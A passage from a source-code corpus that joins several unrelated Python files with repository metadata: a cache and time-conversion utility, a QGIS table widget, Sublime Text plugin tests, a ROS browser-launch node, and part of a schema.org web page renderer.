def _f(*args, **kwargs):
k = keyer(*args, **kwargs)
if k in cache:
result = cache[k]
else:
result = f(*args, **kwargs)
cache[k] = result
return result
return _f
def years_to_seconds(years):
"""
Converts `years` to seconds.
"""
return 3.15569e7 * years
def months_to_seconds(months):
"""
Converts `months` to seconds.
"""
return 2.62974e6 * months
def weeks_to_seconds(weeks):
"""
Converts `weeks` to seconds.
"""
return 604800.0 * weeks
def days_to_seconds(days):
"""
Converts `days` to seconds.
"""
return 86400.0 * days
def hours_to_seconds(hours):
"""
Converts `hours` to seconds.
"""
return 3600.0 * hours
def minutes_to_seconds(minutes):
"""
Converts `minutes` to seconds.
"""
return 60.0 * minutes
def seconds_to_seconds(seconds):
"""
Converts `seconds` to seconds as a :class:`float`.
"""
return float(seconds)
TIME_CONVERTERS = {"years" : years_to_seconds,
"months" : months_to_seconds,
"weeks" : weeks_to_seconds,
"days" : days_to_seconds,
"hours" : hours_to_seconds,
"minutes" : minutes_to_seconds,
"seconds" : seconds_to_seconds}
def to_seconds(**kwargs):
"""
Converts keyword arguments to seconds.
The the keyword arguments can have the following keys:
- ``years`` (31,556,900 seconds per year)
- ``months`` (2,629,740 seconds per month)
- ``weeks`` (604,800 seconds per week)
- ``days`` (86,400 seconds per day)
- ``hours`` (3600 seconds per hour)
- ``minutes`` (60 seconds per minute)
- ``seconds``
>>> to_seconds(seconds=15, minutes=20)
1215.0
>>> to_seconds(seconds=15.42, hours=10, minutes=18, years=2)
63150895.42
"""
seconds = []
for k, v in kwargs.items():
if k in TIME_CONVERTERS:
seconds.append(TIME_CONVERTERS[k](v))
else:
msg = "Not a valid unit of time: '%s'" % k
raise TimeError(msg)
return sum(seconds)
| cfairbanks/calibre-comicvine | pyfscache/fscache.py | Python | mit | 15,558 |
"""
/***************************************************************************
Name : ComposerPhotoDatSourceEditor
Description : Widget for specifying data properties for tables in
the document designer.
Date : 5/January/2015
copyright : (C) 2014 by UN-Habitat and implementing partners.
See the accompanying file CONTRIBUTORS.txt in the root
email : stdm@unhabitat.org
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from qgis.PyQt import uic
from qgis.PyQt.QtWidgets import (
QApplication,
QWidget
)
from qgis.core import (
QgsLayoutFrame,
QgsProject
)
from stdm.composer.layout_utils import LayoutUtils
from stdm.data.pg_utils import (
vector_layer
)
from stdm.ui.composer.referenced_table_editor import LinkedTableProps
from stdm.ui.gui_utils import GuiUtils
from stdm.ui.notification import (
NotificationBar
)
WIDGET, BASE = uic.loadUiType(
GuiUtils.get_ui_file_path('composer/ui_composer_table_source.ui'))
class ComposerTableDataSourceEditor(WIDGET, BASE):
def __init__(self, frame_item, parent=None):
QWidget.__init__(self, parent)
self.setupUi(self)
if isinstance(frame_item, QgsLayoutFrame):
self._composer_table_item = frame_item.multiFrame()
else:
self._composer_table_item = frame_item
self._layout = self._composer_table_item.layout()
self._notif_bar = NotificationBar(self.vl_notification)
# Load fields if the data source has been specified
ds_name = LayoutUtils.get_stdm_data_source_for_layout(self._layout)
self.ref_table.load_data_source_fields(ds_name)
# Load source tables
self.ref_table.load_link_tables()
self.ref_table.set_layout(self._layout)
# self.ref_table.cbo_ref_table.currentIndexChanged[str].connect(self.set_table_vector_layer)
self.ref_table.cbo_ref_table.currentIndexChanged[str].connect(
self.set_table_vector_layer)
layer_name = self.current_table_layer_name()
idx = self.ref_table.cbo_ref_table.findText(layer_name)
self.ref_table.cbo_ref_table.setCurrentIndex(idx)
def composer_item(self):
return self._composer_table_item
def current_table_layer_name(self):
return self._composer_table_item.vectorLayer().name() if self._composer_table_item.vectorLayer() else ''
def set_table_vector_layer(self, table_name):
"""
Creates a vector layer and appends it to the composer table item.
:param table_name: Name of the linked table containing tabular
information.
:type table_name: str
"""
self._notif_bar.clear()
if not table_name:
return
v_layer = vector_layer(table_name)
if v_layer is None:
msg = QApplication.translate("ComposerTableDataSourceEditor",
"A vector layer could not be created from the table.")
self._notif_bar.insertErrorNotification(msg)
return
if not v_layer.isValid():
msg = QApplication.translate("ComposerTableDataSourceEditor",
"Invalid vector layer, the table will not be added.")
self._notif_bar.insertErrorNotification(msg)
return
# No need to add the layer in the legend
QgsProject.instance().addMapLayer(v_layer, False)
if len(self.composer_item().columns()) > 0:
self._composer_table_item.setVectorLayer(v_layer) # _composer_table_item is QgsComposerAttributeTable
self._composer_table_item.update()
def configuration(self):
from stdm.composer.table_configuration import TableConfiguration
linked_table_props = self.ref_table.properties()
table_config = TableConfiguration()
table_config.set_linked_table(linked_table_props.linked_table)
table_config.set_source_field(linked_table_props.source_field)
table_config.set_linked_column(linked_table_props.linked_field)
return table_config
def set_configuration(self, configuration):
# Load referenced table editor with item configuration settings.
table_props = LinkedTableProps(linked_table=configuration.linked_table(),
source_field=configuration.source_field(),
linked_field=configuration.linked_field())
self.ref_table.set_properties(table_props)
| gltn/stdm | stdm/ui/composer/table_data_source.py | Python | gpl-2.0 | 5,385 |
import sublime
from unittest import TestCase
version = sublime.version()
class TestBracketGuard(TestCase):
def setUp(self):
self.view = sublime.active_window().new_file()
self.view.settings().set("is_test", True)
def tearDown(self):
if self.view:
self.view.set_scratch(True)
self.view.window().run_command("close_file")
def insertCodeAndGetRegions(self, code):
self.view.run_command("insert", {"characters": code})
return self.view.get_regions("BracketGuardRegions")
def testPureValidBrackets(self):
openerRegions = self.insertCodeAndGetRegions("([{}])")
self.assertEqual(len(openerRegions), 0)
def testValidBracketsInCode(self):
openerRegions = self.insertCodeAndGetRegions("a(bc[defg{hijkl}mn])o")
self.assertEqual(len(openerRegions), 0)
def testInvalidBracketsWrongCloser(self):
bracketGuardRegions = self.insertCodeAndGetRegions("({}])")
self.assertEqual(len(bracketGuardRegions), 2)
self.assertEqual(bracketGuardRegions[0].a, 0)
self.assertEqual(bracketGuardRegions[1].a, 3)
def testInvalidBracketsNoCloser(self):
bracketGuardRegions = self.insertCodeAndGetRegions("({}")
self.assertEqual(len(bracketGuardRegions), 2)
self.assertEqual(bracketGuardRegions[0].a, -1)
self.assertEqual(bracketGuardRegions[1].a, 0)
def testInvalidBracketsNoOpener(self):
bracketGuardRegions = self.insertCodeAndGetRegions("){}")
self.assertEqual(len(bracketGuardRegions), 2)
self.assertEqual(bracketGuardRegions[0].a, -1)
self.assertEqual(bracketGuardRegions[1].a, 0)
| beni55/Sublime-BracketGuard | tests/testBracketGuard.py | Python | mit | 1,599 |
__author__ = 'kreitz'
| kennethreitz-archive/mead | mead/plugins/sitemap_xml/__init__.py | Python | isc | 22 |
#!/usr/bin/env python3
import rospy
from lg_common import ManagedBrowser, ManagedWindow
from lg_msg_defs.msg import ApplicationState, WindowGeometry
from lg_common.helpers import check_www_dependency, discover_host_from_url, discover_port_from_url
from lg_common.helpers import run_with_influx_exception_handler
from std_msgs.msg import String
NODE_NAME = 'static_browser'
def main():
rospy.init_node(NODE_NAME)
geometry = ManagedWindow.get_viewport_geometry()
url = rospy.get_param('~url', None)
command_line_args = rospy.get_param('~command_line_args', '')
scale_factor = rospy.get_param('~force_device_scale_factor', 1)
extra_logging = rospy.get_param('~extra_logging', False)
debug_port = rospy.get_param('~debug_port', None)
user_agent = rospy.get_param(
'~user_agent', 'Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; '
'en-us AppleWebKit/531.21.10 (KHTML, like Gecko) ' +
'Version/4.0.4 Mobile/7B314 Safari/531.21.10'
)
state = rospy.get_param('~state', ApplicationState.VISIBLE)
extensions = rospy.get_param('~extensions', [])
kiosk = rospy.get_param('~kiosk', True)
global_dependency_timeout = rospy.get_param("/global_dependency_timeout", 15)
depend_on_url = rospy.get_param("~depend_on_url", False)
www_host = discover_host_from_url(url)
www_port = discover_port_from_url(url)
check_www_dependency(depend_on_url, www_host, www_port, 'static browser URL', global_dependency_timeout)
browser = ManagedBrowser(
geometry=geometry,
url=url,
command_line_args=command_line_args,
log_stderr=extra_logging,
force_device_scale_factor=scale_factor,
remote_debugging_port=debug_port,
user_agent=user_agent,
extensions=extensions,
kiosk=kiosk
)
browser.set_state(state)
rospy.Subscriber('{}/state'.format(rospy.get_name()), ApplicationState,
browser.handle_state_msg)
def handle_debug_sock_msg(msg):
browser.send_debug_sock_msg(msg.data)
rospy.Subscriber('{}/debug'.format(rospy.get_name()), String, handle_debug_sock_msg)
rospy.spin()
if __name__ == '__main__':
run_with_influx_exception_handler(main, NODE_NAME)
| EndPointCorp/lg_ros_nodes | lg_common/scripts/static_browser.py | Python | apache-2.0 | 2,261 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os
import re
import webapp2
import jinja2
import logging
import StringIO
from markupsafe import Markup, escape # https://pypi.python.org/pypi/MarkupSafe
import parsers
from google.appengine.ext import ndb
from google.appengine.ext import blobstore
from google.appengine.api import users
from google.appengine.ext.webapp import blobstore_handlers
from api import inLayer, read_file, full_path, read_schemas, read_extensions, read_examples, namespaces, DataCache
from api import Unit, GetTargets, GetSources
from api import GetComment, all_terms, GetAllTypes, GetAllProperties
from api import GetParentList, GetImmediateSubtypes, HasMultipleBaseTypes
from api import GetJsonLdContext
logging.basicConfig(level=logging.INFO) # dev_appserver.py --log_level debug .
log = logging.getLogger(__name__)
SCHEMA_VERSION=2.1
sitemode = "mainsite" # whitespaced list for CSS tags,
# e.g. "mainsite testsite" when off expected domains
# "extensionsite" when in an extension (e.g. blue?)
releaselog = { "2.0": "2015-05-13", "2.1": "2015-08-06" }
#
host_ext = ""
myhost = ""
myport = ""
mybasehost = ""
silent_skip_list = [ "favicon.ico" ] # Do nothing for now
all_layers = {}
ext_re = re.compile(r'([^\w,])+')
PageCache = {}
#TODO: Modes:
# mainsite
# webschemadev
# known extension (not skiplist'd, eg. demo1 on schema.org)
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')),
extensions=['jinja2.ext.autoescape'], autoescape=True, cache_size=0)
ENABLE_JSONLD_CONTEXT = True
ENABLE_CORS = True
ENABLE_HOSTED_EXTENSIONS = True
EXTENSION_SUFFIX = "" # e.g. "*"
ENABLED_EXTENSIONS = [ 'admin', 'auto', 'bib' ]
ALL_LAYERS = [ 'core', 'admin', 'auto', 'bib' ]
debugging = False
# debugging = True
def cleanPath(node):
"""Return the substring of a string matching chars approved for use in our URL paths."""
return re.sub(r'[^a-zA-Z0-9\-/,\.]', '', str(node), flags=re.DOTALL)
class HTMLOutput:
"""Used in place of http response when we're collecting HTML to pass to template engine."""
def __init__(self):
self.outputStrings = []
def write(self, str):
self.outputStrings.append(str)
def toHTML(self):
return Markup ( "".join(self.outputStrings) )
def __str__(self):
return self.toHTML()
# Core API: we have a single schema graph built from triples and units.
# now in api.py
class TypeHierarchyTree:
def __init__(self, prefix=""):
self.txt = ""
self.visited = {}
self.prefix = prefix
def emit(self, s):
self.txt += s + "\n"
def toHTML(self):
return '%s<ul>%s</ul>' % (self.prefix, self.txt)
def toJSON(self):
return self.txt
def traverseForHTML(self, node, depth = 1, hashorslash="/", layers='core'):
"""Generate a hierarchical tree view of the types. hashorslash is used for relative link prefixing."""
log.debug("traverseForHTML: node=%s hashorslash=%s" % ( node.id, hashorslash ))
urlprefix = ""
home = node.getHomeLayer()
if home in ENABLED_EXTENSIONS and home != getHostExt():
urlprefix = makeUrl(home)
extclass = ""
extflag = ""
tooltip=""
if home != "core" and home != "":
extclass = "class=\"ext ext-%s\"" % home
extflag = EXTENSION_SUFFIX
tooltip = "title=\"Extended schema: %s.schema.org\" " % home
# we are a supertype of some kind
if len(node.GetImmediateSubtypes(layers=layers)) > 0:
# and we haven't been here before
if node.id not in self.visited:
self.visited[node.id] = True # remember our visit
self.emit( ' %s<li class="tbranch" id="%s"><a %s %s href="%s%s%s">%s</a>%s' % (" " * 4 * depth, node.id, tooltip, extclass, urlprefix, hashorslash, node.id, node.id, extflag) )
self.emit(' %s<ul>' % (" " * 4 * depth))
# handle our subtypes
for item in node.GetImmediateSubtypes(layers=layers):
self.traverseForHTML(item, depth + 1, hashorslash=hashorslash, layers=layers)
self.emit( ' %s</ul>' % (" " * 4 * depth))
else:
# we are a supertype but we visited this type before, e.g. saw Restaurant via Place then via Organization
seen = ' <a href="#%s">+</a> ' % node.id
self.emit( ' %s<li class="tbranch" id="%s"><a %s %s href="%s%s%s">%s</a>%s%s' % (" " * 4 * depth, node.id, tooltip, extclass, urlprefix, hashorslash, node.id, node.id, extflag, seen) )
# leaf nodes
if len(node.GetImmediateSubtypes(layers=layers)) == 0:
if node.id not in self.visited:
self.emit( '%s<li class="tleaf" id="%s"><a %s %s href="%s%s%s">%s</a>%s%s' % (" " * depth, node.id, tooltip, extclass, urlprefix, hashorslash, node.id, node.id, extflag, "" ))
#else:
#self.visited[node.id] = True # never...
# we tolerate "VideoGame" appearing under both Game and SoftwareApplication
# and would only suppress it if it had its own subtypes. Seems legit.
self.emit( ' %s</li>' % (" " * 4 * depth) )
# based on http://danbri.org/2013/SchemaD3/examples/4063550/hackathon-schema.js - thanks @gregg, @sandro
def traverseForJSONLD(self, node, depth = 0, last_at_this_level = True, supertype="None", layers='core'):
emit_debug = False
if node.id in self.visited:
# self.emit("skipping %s - already visited" % node.id)
return
self.visited[node.id] = True
p1 = " " * 4 * depth
if emit_debug:
self.emit("%s# @id: %s last_at_this_level: %s" % (p1, node.id, last_at_this_level))
global namespaces;
ctx = "{}".format(""""@context": {
"rdfs": "http://www.w3.org/2000/01/rdf-schema#",
"schema": "http://schema.org/",
"rdfs:subClassOf": { "@type": "@id" },
"name": "rdfs:label",
"description": "rdfs:comment",
"children": { "@reverse": "rdfs:subClassOf" }
},\n""" if last_at_this_level and depth==0 else '' )
unseen_subtypes = []
for st in node.GetImmediateSubtypes(layers=layers):
if not st.id in self.visited:
unseen_subtypes.append(st)
unvisited_subtype_count = len(unseen_subtypes)
subtype_count = len( node.GetImmediateSubtypes(layers=layers) )
supertx = "{}".format( '"rdfs:subClassOf": "schema:%s", ' % supertype.id if supertype != "None" else '' )
maybe_comma = "{}".format("," if unvisited_subtype_count > 0 else "")
comment = GetComment(node, layers).strip()
comment = comment.replace('"',"'")
comment = re.sub('<[^<]+?>', '', comment)[:60]
self.emit('\n%s{\n%s\n%s"@type": "rdfs:Class", %s "description": "%s...",\n%s"name": "%s",\n%s"@id": "schema:%s"%s'
% (p1, ctx, p1, supertx, comment, p1, node.id, p1, node.id, maybe_comma))
i = 1
if unvisited_subtype_count > 0:
self.emit('%s"children": ' % p1 )
self.emit(" %s[" % p1 )
inner_lastness = False
for t in unseen_subtypes:
if emit_debug:
self.emit("%s # In %s > %s i: %s unvisited_subtype_count: %s" %(p1, node.id, t.id, i, unvisited_subtype_count))
if i == unvisited_subtype_count:
inner_lastness = True
i = i + 1
self.traverseForJSONLD(t, depth + 1, inner_lastness, supertype=node, layers=layers)
self.emit("%s ]%s" % (p1, "{}".format( "" if not last_at_this_level else '' ) ) )
maybe_comma = "{}".format( ',' if not last_at_this_level else '' )
self.emit('\n%s}%s\n' % (p1, maybe_comma))
def GetExamples(node, layers='core'):
"""Returns the examples (if any) for some Unit node."""
return node.examples
def GetExtMappingsRDFa(node, layers='core'):
"""Self-contained chunk of RDFa HTML markup with mappings for this term."""
if (node.isClass()):
equivs = GetTargets(Unit.GetUnit("owl:equivalentClass"), node, layers=layers)
if len(equivs) > 0:
markup = ''
for c in equivs:
if (c.id.startswith('http')):
markup = markup + "<link property=\"owl:equivalentClass\" href=\"%s\"/>\n" % c.id
else:
markup = markup + "<link property=\"owl:equivalentClass\" resource=\"%s\"/>\n" % c.id
return markup
if (node.isAttribute()):
equivs = GetTargets(Unit.GetUnit("owl:equivalentProperty"), node, layers)
if len(equivs) > 0:
markup = ''
for c in equivs:
markup = markup + "<link property=\"owl:equivalentProperty\" href=\"%s\"/>\n" % c.id
return markup
return "<!-- no external mappings noted for this term. -->"
class ShowUnit (webapp2.RequestHandler):
"""ShowUnit exposes schema.org terms via Web RequestHandler
(HTML/HTTP etc.).
"""
# def __init__(self):
# self.outputStrings = []
def emitCacheHeaders(self):
"""Send cache-related headers via HTTP."""
self.response.headers['Cache-Control'] = "public, max-age=43200" # 12h
self.response.headers['Vary'] = "Accept, Accept-Encoding"
def GetCachedText(self, node, layers='core'):
"""Return page text from node.id cache (if found, otherwise None)."""
global PageCache
cachekey = "%s:%s" % ( layers, node.id ) # was node.id
if (cachekey in PageCache):
return PageCache[cachekey]
else:
return None
def AddCachedText(self, node, textStrings, layers='core'):
"""Cache text of our page for this node via its node.id.
We can be passed a text string or an array of text strings.
"""
global PageCache
cachekey = "%s:%s" % ( layers, node.id ) # was node.id
outputText = "".join(textStrings)
log.debug("CACHING: %s" % node.id)
PageCache[cachekey] = outputText
return outputText
def write(self, str):
"""Write some text to Web server's output stream."""
self.outputStrings.append(str)
def moreInfoBlock(self, node, layer='core'):
# if we think we have more info on this term, show a bulleted list of extra items.
# defaults
bugs = ["No known open issues."]
mappings = ["No recorded schema mappings."]
items = bugs + mappings
items = [
"<a href='https://github.com/schemaorg/schemaorg/issues?q=is%3Aissue+is%3Aopen+{0}'>Check for open issues.</a>".format(node.id)
]
for l in all_terms[node.id]:
l = l.replace("#","")
if ENABLE_HOSTED_EXTENSIONS:
items.append("'{0}' is mentioned in extension layer: <a href='?ext={1}'>{2}</a>".format( node.id, l, l ))
moreinfo = """<div>
<div id='infobox' style='text-align: right;'><b><span style="cursor: pointer;">[more...]</span></b></div>
<div id='infomsg' style='display: none; background-color: #EEEEEE; text-align: left; padding: 0.5em;'>
<ul>"""
for i in items:
moreinfo += "<li>%s</li>" % i
# <li>mappings to other terms.</li>
# <li>or links to open issues.</li>
moreinfo += """</ul>
</div>
</div>
<script type="text/javascript">
$("#infobox").click(function(x) {
element = $("#infomsg");
if (! $(element).is(":visible")) {
$("#infomsg").show(300);
} else {
$("#infomsg").hide(300);
}
});
</script>"""
return moreinfo
def GetParentStack(self, node, layers='core'):
"""Returns a hiearchical structured used for site breadcrumbs."""
thing = Unit.GetUnit("Thing")
if (node not in self.parentStack):
self.parentStack.append(node)
if (Unit.isAttribute(node, layers=layers)):
self.parentStack.append(Unit.GetUnit("Property"))
self.parentStack.append(thing)
sc = Unit.GetUnit("rdfs:subClassOf")
if GetTargets(sc, node, layers=layers):
for p in GetTargets(sc, node, layers=layers):
self.GetParentStack(p, layers=layers)
else:
# Enumerations are classes that have no declared subclasses
sc = Unit.GetUnit("typeOf")
for p in GetTargets(sc, node, layers=layers):
self.GetParentStack(p, layers=layers)
#Put 'Thing' to the end for multiple inheritance classes
if(thing in self.parentStack):
self.parentStack.remove(thing)
self.parentStack.append(thing)
def ml(self, node, label='', title='', prop='', hashorslash='/'):
"""ml ('make link')
Returns an HTML-formatted link to the class or property URL
* label = optional anchor text label for the link
* title = optional title attribute on the link
* prop = an optional property value to apply to the A element
"""
if(node.id == "DataType"): #Special case
return "<a href=\"%s\">%s</a>" % (node.id, node.id)
if label=='':
label = node.id
if title != '':
title = " title=\"%s\"" % (title)
if prop:
prop = " property=\"%s\"" % (prop)
urlprefix = ""
home = node.getHomeLayer()
if home in ENABLED_EXTENSIONS and home != getHostExt():
port = ""
if myport != "80":
port = ":%s" % myport
urlprefix = makeUrl(home)
extclass = ""
extflag = ""
tooltip = ""
if home != "core" and home != "":
extclass = "class=\"ext ext-%s\" " % home
extflag = EXTENSION_SUFFIX
tooltip = "title=\"Extended schema: %s.schema.org\" " % home
return "<a %s %s href=\"%s%s%s\"%s%s>%s</a>%s" % (tooltip, extclass, urlprefix, hashorslash, node.id, prop, title, label, extflag)
def makeLinksFromArray(self, nodearray, tooltip=''):
"""Make a comma separate list of links via ml() function.
* tooltip - optional text to use as title of all links
"""
hyperlinks = []
for f in nodearray:
hyperlinks.append(self.ml(f, f.id, tooltip))
return (", ".join(hyperlinks))
def emitUnitHeaders(self, node, layers='core'):
"""Write out the HTML page headers for this node."""
self.write("<h1 class=\"page-title\">\n")
self.write(node.id)
self.write("</h1>")
home = node.home
if home != "core" and home != "":
self.write("Defined in the %s.schema.org extension." % home)
self.write(" (This is an initial exploratory release.)<br/>")
self.emitCanonicalURL(node)
self.BreadCrumbs(node, layers=layers)
comment = GetComment(node, layers)
self.write(" <div property=\"rdfs:comment\">%s</div>\n\n" % (comment) + "\n")
self.write(" <br/><div>Usage: %s</div>\n\n" % (node.UsageStr()) + "\n")
self.write(self.moreInfoBlock(node))
if (node.isClass(layers=layers) and not node.isDataType(layers=layers) and node.id != "DataType"):
self.write("<table class=\"definition-table\">\n <thead>\n <tr><th>Property</th><th>Expected Type</th><th>Description</th> \n </tr>\n </thead>\n\n")
def emitCanonicalURL(self,node):
cURL = "http://schema.org/" + node.id
self.write(" <span class=\"canonicalUrl\">Canonical URL: <a href=\"%s\">%s</a></span>" % (cURL, cURL))
# Stacks to support multiple inheritance
crumbStacks = []
def BreadCrumbs(self, node, layers):
self.crumbStacks = []
cstack = []
self.crumbStacks.append(cstack)
self.WalkCrumbs(node,cstack,layers=layers)
if (node.isAttribute(layers=layers)):
cstack.append(Unit.GetUnit("Property"))
cstack.append(Unit.GetUnit("Thing"))
enuma = node.isEnumerationValue(layers=layers)
self.write("<h4>")
rowcount = 0
for row in range(len(self.crumbStacks)):
if(":" in self.crumbStacks[row][len(self.crumbStacks[row])-1].id):
continue
count = 0
if rowcount > 0:
self.write("<br/>")
self.write("<span class='breadcrumbs'>")
while(len(self.crumbStacks[row]) > 0):
n = self.crumbStacks[row].pop()
if(count > 0):
if((len(self.crumbStacks[row]) == 0) and enuma):
self.write(" :: ")
else:
self.write(" > ")
elif n.id == "Class": # If Class is first breadcrum suppress it
continue
count += 1
self.write("%s" % (self.ml(n)))
self.write("</span>\n")
rowcount += 1
self.write("</h4>\n")
#Walk up the stack, appending crumbs & create new (duplicating crumbs already identified) if more than one parent found
def WalkCrumbs(self, node, cstack, layers):
if "http://" in node.id: #Suppress external class references
return
cstack.append(node)
tmpStacks = []
tmpStacks.append(cstack)
subs = []
if(node.isDataType(layers=layers)):
subs = GetTargets(Unit.GetUnit("typeOf"), node, layers=layers)
subs += GetTargets(Unit.GetUnit("rdfs:subClassOf"), node, layers=layers)
elif node.isClass(layers=layers):
subs = GetTargets(Unit.GetUnit("rdfs:subClassOf"), node, layers=layers)
elif(node.isAttribute(layers=layers)):
subs = GetTargets(Unit.GetUnit("rdfs:subPropertyOf"), node, layers=layers)
else:
subs = GetTargets(Unit.GetUnit("typeOf"), node, layers=layers)# Enumerations are classes that have no declared subclasses
for i in range(len(subs)):
if(i > 0):
t = cstack[:]
tmpStacks.append(t)
self.crumbStacks.append(t)
x = 0
for p in subs:
self.WalkCrumbs(p,tmpStacks[x],layers=layers)
x += 1
def emitSimplePropertiesPerType(self, cl, layers="core", out=None, hashorslash="/"):
"""Emits a simple list of properties applicable to the specified type."""
if not out:
out = self
out.write("<ul class='props4type'>")
for prop in sorted(GetSources( Unit.GetUnit("domainIncludes"), cl, layers=layers), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
out.write("<li><a href='%s%s'>%s</a></li>" % ( hashorslash, prop.id, prop.id ))
out.write("</ul>\n\n")
def emitSimplePropertiesIntoType(self, cl, layers="core", out=None, hashorslash="/"):
"""Emits a simple list of properties whose values are the specified type."""
if not out:
out = self
out.write("<ul class='props2type'>")
for prop in sorted(GetSources( Unit.GetUnit("rangeIncludes"), cl, layers=layers), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
out.write("<li><a href='%s%s'>%s</a></li>" % ( hashorslash, prop.id, prop.id ))
out.write("</ul>\n\n")
def ClassProperties (self, cl, subclass=False, layers="core", out=None, hashorslash="/"):
"""Write out a table of properties for a per-type page."""
if not out:
out = self
propcount = 0
headerPrinted = False
di = Unit.GetUnit("domainIncludes")
ri = Unit.GetUnit("rangeIncludes")
for prop in sorted(GetSources(di, cl, layers=layers), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
supersedes = prop.supersedes(layers=layers)
olderprops = prop.supersedes_all(layers=layers)
inverseprop = prop.inverseproperty(layers=layers)
subprops = prop.subproperties(layers=layers)
superprops = prop.superproperties(layers=layers)
ranges = GetTargets(ri, prop, layers=layers)
comment = GetComment(prop, layers=layers)
if (not headerPrinted):
class_head = self.ml(cl)
if subclass:
class_head = self.ml(cl, prop="rdfs:subClassOf")
out.write("<tr class=\"supertype\">\n <th class=\"supertype-name\" colspan=\"3\">Properties from %s</th>\n \n</tr>\n\n<tbody class=\"supertype\">\n " % (class_head))
headerPrinted = True
out.write("<tr typeof=\"rdfs:Property\" resource=\"http://schema.org/%s\">\n \n <th class=\"prop-nam\" scope=\"row\">\n\n<code property=\"rdfs:label\">%s</code>\n </th>\n " % (prop.id, self.ml(prop)))
out.write("<td class=\"prop-ect\">\n")
first_range = True
for r in ranges:
if (not first_range):
out.write(" or <br/> ")
first_range = False
out.write(self.ml(r, prop='rangeIncludes'))
out.write(" ")
out.write("</td>")
out.write("<td class=\"prop-desc\" property=\"rdfs:comment\">%s" % (comment))
if (len(olderprops) > 0):
olderlinks = ", ".join([self.ml(o) for o in olderprops])
out.write(" Supersedes %s." % olderlinks )
if (inverseprop != None):
out.write("<br/> Inverse property: %s." % (self.ml(inverseprop)))
out.write("</td></tr>")
subclass = False
propcount += 1
if subclass: # in case the superclass has no defined attributes
out.write("<tr><td colspan=\"3\"><meta property=\"rdfs:subClassOf\" content=\"%s\"></td></tr>" % (cl.id))
return propcount
def emitClassExtensionSuperclasses (self, cl, layers="core", out=None):
first = True
count = 0
if not out:
out = self
buff = StringIO.StringIO()
sc = Unit.GetUnit("rdfs:subClassOf")
for p in GetTargets(sc, cl, ALL_LAYERS):
if inLayer(layers,p):
continue
if p.id == "http://www.w3.org/2000/01/rdf-schema#Class": #Special case for "DataType"
p.id = "Class"
sep = ", "
if first:
sep = "<li>"
first = False
buff.write("%s%s" % (sep,self.ml(p)))
count += 1
if(count > 0):
buff.write("</li>\n")
content = buff.getvalue()
if(len(content) > 0):
if cl.id == "DataType":
self.write("<h4>Subclass of:<h4>")
else:
self.write("<h4>Available supertypes defined in extensions</h4>")
self.write("<ul>")
self.write(content)
self.write("</ul>")
buff.close()
def emitClassExtensionProperties (self, cl, layers="core", out=None):
if not out:
out = self
buff = StringIO.StringIO()
for p in self.parentStack:
self._ClassExtensionProperties(buff, p, layers=layers)
content = buff.getvalue()
if(len(content) > 0):
self.write("<h4>Available properties in extensions</h4>")
self.write("<ul>")
self.write(content)
self.write("</ul>")
buff.close()
def _ClassExtensionProperties (self, out, cl, layers="core"):
"""Write out a list of properties not displayed as they are in extensions for a per-type page."""
di = Unit.GetUnit("domainIncludes")
first = True
count = 0
for prop in sorted(GetSources(di, cl, ALL_LAYERS), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
if inLayer(layers,prop):
continue
log.debug("ClassExtensionfFound %s " % (prop))
sep = ", "
if first:
out.write("<li>From %s: " % cl)
sep = ""
first = False
out.write("%s%s" % (sep,self.ml(prop)))
count += 1
if(count > 0):
out.write("</li>\n")
def emitClassIncomingProperties (self, cl, layers="core", out=None, hashorslash="/"):
"""Write out a table of incoming properties for a per-type page."""
if not out:
out = self
headerPrinted = False
di = Unit.GetUnit("domainIncludes")
ri = Unit.GetUnit("rangeIncludes")
for prop in sorted(GetSources(ri, cl, layers=layers), key=lambda u: u.id):
if (prop.superseded(layers=layers)):
continue
supersedes = prop.supersedes(layers=layers)
inverseprop = prop.inverseproperty(layers=layers)
subprops = prop.subproperties(layers=layers)
superprops = prop.superproperties(layers=layers)
ranges = GetTargets(di, prop, layers=layers)
comment = GetComment(prop, layers=layers)
if (not headerPrinted):
self.write("<br/><br/>Instances of %s may appear as values for the following properties<br/>" % (self.ml(cl)))
self.write("<table class=\"definition-table\">\n \n \n<thead>\n <tr><th>Property</th><th>On Types</th><th>Description</th> \n </tr>\n</thead>\n\n")
headerPrinted = True
self.write("<tr>\n<th class=\"prop-nam\" scope=\"row\">\n <code>%s</code>\n</th>\n " % (self.ml(prop)) + "\n")
self.write("<td class=\"prop-ect\">\n")
first_range = True
for r in ranges:
if (not first_range):
self.write(" or<br/> ")
first_range = False
self.write(self.ml(r))
self.write(" ")
self.write("</td>")
self.write("<td class=\"prop-desc\">%s " % (comment))
if (supersedes != None):
self.write(" Supersedes %s." % (self.ml(supersedes)))
if (inverseprop != None):
self.write("<br/> inverse property: %s." % (self.ml(inverseprop)) )
self.write("</td></tr>")
if (headerPrinted):
self.write("</table>\n")
def emitRangeTypesForProperty(self, node, layers="core", out=None, hashorslash="/"):
"""Write out simple HTML summary of this property's expected types."""
if not out:
out = self
out.write("<ul class='attrrangesummary'>")
for rt in sorted(GetTargets(Unit.GetUnit("rangeIncludes"), node, layers=layers), key=lambda u: u.id):
out.write("<li><a href='%s%s'>%s</a></li>" % ( hashorslash, rt.id, rt.id ))
out.write("</ul>\n\n")
def emitDomainTypesForProperty(self, node, layers="core", out=None, hashorslash="/"):
"""Write out simple HTML summary of types that expect this property."""
if not out:
out = self
out.write("<ul class='attrdomainsummary'>")
for dt in sorted(GetTargets(Unit.GetUnit("domainIncludes"), node, layers=layers), key=lambda u: u.id):
out.write("<li><a href='%s%s'>%s</a></li>" % ( hashorslash, dt.id, dt.id ))
out.write("</ul>\n\n")
def emitAttributeProperties(self, node, layers="core", out=None, hashorslash="/"):
"""Write out properties of this property, for a per-property page."""
if not out:
out = self
di = Unit.GetUnit("domainIncludes")
ri = Unit.GetUnit("rangeIncludes")
ranges = sorted(GetTargets(ri, node, layers=layers), key=lambda u: u.id)
